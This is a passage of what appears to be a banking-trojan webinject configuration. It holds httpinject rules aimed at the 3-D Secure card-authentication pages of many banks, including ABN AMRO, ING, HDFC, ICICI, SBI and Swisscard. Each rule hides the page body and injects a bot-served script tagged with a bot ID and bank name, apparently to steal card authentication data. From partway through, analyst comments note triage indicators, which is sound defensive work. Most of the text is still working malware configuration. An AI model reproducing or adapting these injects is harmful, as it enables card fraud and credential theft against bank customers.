  505. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3ds\.cardcenter\.ch/acspage/cap\?RID\=.*]]></url>
  506. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  507. </url>
  508. </conditions>
  509. <actions>
  510. <modify>
  511. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  512. <replacement><![CDATA[\1<style type="text/css">
  513. body {visibility: hidden; }
  514. </style>
  515. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  516. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardcenter"></script>]]></replacement>
  517. </modify>
  518. </actions>
  519. </httpinject>
  520. <httpinject>
  521. <conditions>
  522. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.sebkort\.com/skm/acspage/cap\?RID\=.*]]></url>
  523. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  524. </url>
  525. </conditions>
  526. <actions>
  527. <modify>
  528. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  529. <replacement><![CDATA[\1<style type="text/css">
  530. body {visibility: hidden; }
  531. </style>
  532. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  533. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=sebkort"></script>]]></replacement>
  534. </modify>
  535. </actions>
  536. </httpinject>
  537. <httpinject>
  538. <conditions>
  539. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs1\.viseca\.ch/acspage/cap\?RID\=.*]]></url>
  540. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  541. </url>
  542. </conditions>
  543. <actions>
  544. <modify>
  545. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  546. <replacement><![CDATA[\1<style type="text/css">
  547. body {visibility: hidden; }
  548. </style>
  549. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  550. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=viseca"></script>]]></replacement>
  551. </modify>
  552. </actions>
  553. </httpinject>
  554. <httpinject>
  555. <conditions>
  556. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.icscards\.nl/acspage/cap\?RID\=.*]]></url>
  557. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  558. </url>
  559. </conditions>
  560. <actions>
  561. <modify>
  562. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  563. <replacement><![CDATA[\1<style type="text/css">
  564. body {visibility: hidden; }
  565. </style>
  566. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  567. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=icscards"></script>]]></replacement>
  568. </modify>
  569. </actions>
  570. </httpinject>
  571. <httpinject>
  572. <conditions>
  573. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.swisscard\.ch/acspage/cap\?RID\=.*]]></url>
  574. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  575. </url>
  576. </conditions>
  577. <actions>
  578. <modify>
  579. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  580. <replacement><![CDATA[\1<style type="text/css">
  581. body {visibility: hidden; }
  582. </style>
  583. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  584. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=swisscard"></script>]]></replacement>
  585. </modify>
  586. </actions>
  587. </httpinject>
  588. <httpinject>
  589. <conditions>
  590. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3ds\.jccsecure\.com/acspage/cap\?RID\=.*]]></url>
  591. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  592. </url>
  593. </conditions>
  594. <actions>
  595. <modify>
  596. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  597. <replacement><![CDATA[\1<style type="text/css">
  598. body {visibility: hidden; }
  599. </style>
  600. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  601. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=jccsecure"></script>]]></replacement>
  602. </modify>
  603. </actions>
  604. </httpinject>
  605. <httpinject>
  606. <conditions>
  607. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure-code\.mlp\.de/acspage/cap\?RID\=.*]]></url>
  608. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  609. </url>
  610. </conditions>
  611. <actions>
  612. <modify>
  613. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  614. <replacement><![CDATA[\1<style type="text/css">
  615. body {visibility: hidden; }
  616. </style>
  617. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  618. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=mlp"></script>]]></replacement>
  619. </modify>
  620. </actions>
  621. </httpinject>
  622. <httpinject>
       <!-- Trigger: URLs on securecode.abnamro.nl starting with /acspage/cap?RID= (allow regex,
            anchored at the start only; onget="1", onpost="1"). The path suggests a
            card-authentication (ACS) step; confirm against the issuer's real flow. The deny
            entry (onget="1", onpost="0") lists static asset extensions. -->
  623. <conditions>
  624. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://securecode\.abnamro\.nl/acspage/cap\?RID\=.*]]></url>
  625. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  626. </url>
  627. </conditions>
  628. <actions>
  629. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=abnamro. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  630. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  631. <replacement><![CDATA[\1<style type="text/css">
  632. body {visibility: hidden; }
  633. </style>
  634. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  635. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=abnamro"></script>]]></replacement>
  636. </modify>
  637. </actions>
  638. </httpinject>
  639. <httpinject>
       <!-- Trigger: URLs on acs.netcetera.ch starting with /acspage/cap?RID= (allow regex,
            anchored at the start only; onget="1", onpost="1"). The host and path suggest a
            hosted card-authentication (ACS) page; confirm before attributing to an issuer.
            The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  640. <conditions>
  641. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.netcetera\.ch/acspage/cap\?RID\=.*]]></url>
  642. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  643. </url>
  644. </conditions>
  645. <actions>
  646. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=netcetera. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  647. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  648. <replacement><![CDATA[\1<style type="text/css">
  649. body {visibility: hidden; }
  650. </style>
  651. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  652. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=netcetera"></script>]]></replacement>
  653. </modify>
  654. </actions>
  655. </httpinject>
  656. <httpinject>
       <!-- Trigger: URLs on securecode.ing.nl starting with /acspage/cap?RID= (allow regex,
            anchored at the start only; onget="1", onpost="1"). The path suggests a
            card-authentication (ACS) step; confirm against the issuer's real flow. The deny
            entry (onget="1", onpost="0") lists static asset extensions. -->
  657. <conditions>
  658. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://securecode\.ing\.nl/acspage/cap\?RID\=.*]]></url>
  659. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  660. </url>
  661. </conditions>
  662. <actions>
  663. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=ing. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  664. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  665. <replacement><![CDATA[\1<style type="text/css">
  666. body {visibility: hidden; }
  667. </style>
  668. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  669. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=ing"></script>]]></replacement>
  670. </modify>
  671. </actions>
  672. </httpinject>
  673. <httpinject>
       <!-- Trigger: every URL on netsafe.hdfcbank.com under /ACSWeb/jsp/ (allow regex, anchored
            at the start only and ending in .*; onget="1", onpost="1"). The ACSWeb path suggests
            a card-authentication (ACS) application; confirm against the issuer's real flow.
            The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  674. <conditions>
  675. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://netsafe\.hdfcbank\.com/ACSWeb/jsp/.*]]></url>
  676. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  677. </url>
  678. </conditions>
  679. <actions>
  680. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=hdfcbank. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  681. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  682. <replacement><![CDATA[\1<style type="text/css">
  683. body {visibility: hidden; }
  684. </style>
  685. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  686. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=hdfcbank"></script>]]></replacement>
  687. </modify>
  688. </actions>
  689. </httpinject>
  690. <httpinject>
       <!-- Trigger: URLs on secure.axisbank.com starting with
            /ACSWeb/EnrollWeb/AxisBank/server/AccessControlServer (allow regex, anchored at the
            start only; onget="1", onpost="1"). The path names an access control server, which
            suggests a card-authentication step; confirm against the issuer's real flow. The
            deny entry (onget="1", onpost="0") lists static asset extensions. -->
  691. <conditions>
  692. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure\.axisbank\.com/ACSWeb/EnrollWeb/AxisBank/server/AccessControlServer.*]]></url>
  693. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  694. </url>
  695. </conditions>
  696. <actions>
  697. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=axisbank. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  698. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  699. <replacement><![CDATA[\1<style type="text/css">
  700. body {visibility: hidden; }
  701. </style>
  702. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  703. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=axisbank"></script>]]></replacement>
  704. </modify>
  705. </actions>
  706. </httpinject>
  707. <httpinject>
       <!-- Trigger: URLs on www.3dsecure.icicibank.com starting with
            /ACSWeb/EnrollWeb/ICICIBank/server/AccessControlServer (allow regex, anchored at the
            start only; onget="1", onpost="1"). Host and path point at a 3-D Secure access
            control server page. The deny entry (onget="1", onpost="0") lists static asset
            extensions. -->
  708. <conditions>
  709. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.3dsecure\.icicibank\.com/ACSWeb/EnrollWeb/ICICIBank/server/AccessControlServer.*]]></url>
  710. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  711. </url>
  712. </conditions>
  713. <actions>
  714. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=icicibank.3dsecure. Indicators for triage: that path
            with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  715. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  716. <replacement><![CDATA[\1<style type="text/css">
  717. body {visibility: hidden; }
  718. </style>
  719. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  720. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=icicibank.3dsecure"></script>]]></replacement>
  721. </modify>
  722. </actions>
  723. </httpinject>
  724. <httpinject>
       <!-- Trigger: URLs on secureonline.idbibank.com starting with
            /ACSWeb/EnrollWeb/IDBIBank/server/AccessControlServer (allow regex, anchored at the
            start only; onget="1", onpost="1"). The path names an access control server, which
            suggests a card-authentication step. The deny entry (onget="1", onpost="0") lists
            static asset extensions. -->
  725. <conditions>
  726. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secureonline\.idbibank\.com/ACSWeb/EnrollWeb/IDBIBank/server/AccessControlServer.*]]></url>
  727. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  728. </url>
  729. </conditions>
  730. <actions>
  731. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive; other rules in this listing use the upper-case spelling) and re-emits
            it (\1) followed by a CSS rule hiding the body, jQuery 1.4.2 from the Google CDN, and
            a script from the site-relative path /logs/dtukvbv/js.php with system=idbibank. The
            same tag is reused by the following rule for auth/VBV.jsp, so the tag alone does not
            tell the two pages apart. Indicators for triage: that path with botid/system
            parameters, and the visibility:hidden style right after the head tag. -->
  732. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  733. <replacement><![CDATA[\1<style type="text/css">
  734. body {visibility: hidden; }
  735. </style>
  736. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  737. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=idbibank"></script>]]></replacement>
  738. </modify>
  739. </actions>
  740. </httpinject>
  741. <httpinject>
       <!-- Trigger: URLs on secureonline.idbibank.com starting with
            /ACSWeb/EnrollWeb/IDBIBank/auth/VBV.jsp (allow regex, anchored at the start only;
            onget="1", onpost="1"). The file name suggests a Verified by Visa prompt; confirm
            against the issuer's real flow. The deny entry (onget="1", onpost="0") lists static
            asset extensions. -->
  742. <conditions>
  743. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secureonline\.idbibank\.com/ACSWeb/EnrollWeb/IDBIBank/auth/VBV\.jsp.*]]></url>
  744. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  745. </url>
  746. </conditions>
  747. <actions>
  748. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=idbibank. The preceding rule for the
            AccessControlServer URL uses the same tag, so the tag alone does not tell the two
            pages apart. Indicators for triage: that path with botid/system parameters, and the
            visibility:hidden style right after the head tag. -->
  749. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  750. <replacement><![CDATA[\1<style type="text/css">
  751. body {visibility: hidden; }
  752. </style>
  753. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  754. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=idbibank"></script>]]></replacement>
  755. </modify>
  756. </actions>
  757. </httpinject>
  758. <httpinject>
       <!-- Trigger: URLs on secureonline.idbibank.com starting with
            /ACSWeb/EnrollWeb/IDBIBank/auth/SCode.jsp (allow regex, anchored at the start only;
            onget="1", onpost="1"). The file name suggests a SecureCode prompt; confirm against
            the issuer's real flow. The deny entry (onget="1", onpost="0") lists static asset
            extensions. -->
  759. <conditions>
  760. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secureonline\.idbibank\.com/ACSWeb/EnrollWeb/IDBIBank/auth/SCode\.jsp.*]]></url>
  761. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  762. </url>
  763. </conditions>
  764. <actions>
  765. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=idbibank.scode. Indicators for triage: that path
            with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  766. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  767. <replacement><![CDATA[\1<style type="text/css">
  768. body {visibility: hidden; }
  769. </style>
  770. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  771. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=idbibank.scode"></script>]]></replacement>
  772. </modify>
  773. </actions>
  774. </httpinject>
  775. <httpinject>
       <!-- Trigger: every URL on 3dsecure.acb.com.vn under /ACB/jsp/ (allow regex, anchored at
            the start only and ending in .*; onget="1", onpost="1"). The host name points at a
            3-D Secure service. The deny entry (onget="1", onpost="0") lists static asset
            extensions. -->
  776. <conditions>
  777. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://3dsecure\.acb\.com\.vn/ACB/jsp/.*]]></url>
  778. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  779. </url>
  780. </conditions>
  781. <actions>
  782. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=acb.vn. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  783. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  784. <replacement><![CDATA[\1<style type="text/css">
  785. body {visibility: hidden; }
  786. </style>
  787. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  788. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=acb.vn"></script>]]></replacement>
  789. </modify>
  790. </actions>
  791. </httpinject>
  792. <httpinject>
       <!-- Trigger: every URL on cards.indusind.com under /IndusindBank/jsp/ (allow regex,
            anchored at the start only and ending in .*; onget="1", onpost="1"). Presumably a
            card-authentication application; the URL alone does not confirm that. The deny entry
            (onget="1", onpost="0") lists static asset extensions. -->
  793. <conditions>
  794. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cards\.indusind\.com/IndusindBank/jsp/.*]]></url>
  795. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  796. </url>
  797. </conditions>
  798. <actions>
  799. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=indusind. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  800. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  801. <replacement><![CDATA[\1<style type="text/css">
  802. body {visibility: hidden; }
  803. </style>
  804. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  805. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=indusind"></script>]]></replacement>
  806. </modify>
  807. </actions>
  808. </httpinject>
  809. <httpinject>
       <!-- Trigger: every URL on corpbank.electracard.com under /corpbank/jsp/ (allow regex,
            anchored at the start only and ending in .*; onget="1", onpost="1"). Presumably a
            hosted card-authentication page; the URL alone does not confirm that. The deny entry
            (onget="1", onpost="0") lists static asset extensions. -->
  810. <conditions>
  811. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://corpbank\.electracard\.com/corpbank/jsp/.*]]></url>
  812. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  813. </url>
  814. </conditions>
  815. <actions>
  816. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=electracard. The tag has no bank suffix, unlike the
            electracard.pnb, electracard.ubi and electracard.cbi rules in this listing.
            Indicators for triage: that path with botid/system parameters, and the
            visibility:hidden style right after the head tag. -->
  817. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  818. <replacement><![CDATA[\1<style type="text/css">
  819. body {visibility: hidden; }
  820. </style>
  821. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  822. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard"></script>]]></replacement>
  823. </modify>
  824. </actions>
  825. </httpinject>
  826. <httpinject>
       <!-- Trigger: URLs on www.securepay.hsbc.co.in starting with
            /SecurePay/servlet/Authenticate (allow regex, anchored at the start only;
            onget="1", onpost="1"). The servlet name suggests an authentication step; confirm
            against the issuer's real flow. The deny entry (onget="1", onpost="0") lists static
            asset extensions. -->
  827. <conditions>
  828. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.securepay\.hsbc\.co\.in/SecurePay/servlet/Authenticate.*]]></url>
  829. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  830. </url>
  831. </conditions>
  832. <actions>
  833. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=hsbc.co.in. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  834. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  835. <replacement><![CDATA[\1<style type="text/css">
  836. body {visibility: hidden; }
  837. </style>
  838. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  839. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=hsbc.co.in"></script>]]></replacement>
  840. </modify>
  841. </actions>
  842. </httpinject>
  843. <httpinject>
       <!-- Trigger: every URL on acs.onlinesbi.com under /sbi/jsp/ (allow regex, anchored at
            the start only and ending in .*; onget="1", onpost="1"). The acs host label suggests
            an access control server for card authentication. The deny entry (onget="1",
            onpost="0") lists static asset extensions. -->
  844. <conditions>
  845. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.onlinesbi\.com/sbi/jsp/.*]]></url>
  846. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  847. </url>
  848. </conditions>
  849. <actions>
  850. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=onlinesbi. Indicators for triage: that path with
            botid/system parameters, and the visibility:hidden style right after the head tag. -->
  851. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  852. <replacement><![CDATA[\1<style type="text/css">
  853. body {visibility: hidden; }
  854. </style>
  855. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  856. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=onlinesbi"></script>]]></replacement>
  857. </modify>
  858. </actions>
  859. </httpinject>
  860. <httpinject>
       <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
            /ACSWeb/EnrollWeb/CanaraBank/server/AccessControlServer (allow regex, anchored at the
            start only; onget="1", onpost="1"). The bank is selected by the path segment, not the
            host. The deny entry (onget="1", onpost="0") lists static asset extensions. -->
  861. <conditions>
  862. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cardsecurity\.enstage\.com/ACSWeb/EnrollWeb/CanaraBank/server/AccessControlServer.*]]></url>
  863. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  864. </url>
  865. </conditions>
  866. <actions>
  867. <modify>
       <!-- Rewrite: captures the opening upper-case HEAD tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=enstage. The tag has no bank suffix although the
            URL names CanaraBank; the other enstage rules in this listing use a suffixed tag.
            Indicators for triage: that path with botid/system parameters, and the
            visibility:hidden style right after the head tag. -->
  868. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
  869. <replacement><![CDATA[\1<style type="text/css">
  870. body {visibility: hidden; }
  871. </style>
  872. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  873. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=enstage"></script>]]></replacement>
  874. </modify>
  875. </actions>
  876. </httpinject>
  877. <httpinject>
       <!-- Trigger: every URL on pnb.electracard.com under /pnb/jsp/ (allow regex, anchored at
            the start only and ending in .*; onget="1", onpost="1"). Presumably a hosted
            card-authentication page; the URL alone does not confirm that. The deny entry
            (onget="1", onpost="0") lists static asset extensions. -->
  878. <conditions>
  879. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://pnb\.electracard\.com/pnb/jsp/.*]]></url>
  880. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
  881. </url>
  882. </conditions>
  883. <actions>
  884. <modify>
       <!-- Rewrite: captures the opening lower-case head tag ("msU" has no "i", so presumably
            case-sensitive) and re-emits it (\1) followed by a CSS rule hiding the body,
            jQuery 1.4.2 from the Google CDN, and a script from the site-relative path
            /logs/dtukvbv/js.php with system=electracard.pnb. Indicators for triage: that path
            with botid/system parameters, and the visibility:hidden style right after the head tag. -->
  885. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
  886. <replacement><![CDATA[\1<style type="text/css">
  887. body {visibility: hidden; }
  888. </style>
  889. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
  890. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.pnb"></script>]]></replacement>
  891. </modify>
  892. </actions>
  893. </httpinject>
  894. <httpinject>
       <!-- Trigger: URLs on the shared host cardsecurity.enstage.com starting with
            /ACSWeb/EnrollWeb/IndianBank/server/AccessControlServer (allow regex, anchored at the
            start only; onget="1", onpost="1"). The bank is selected by the path segment, not the
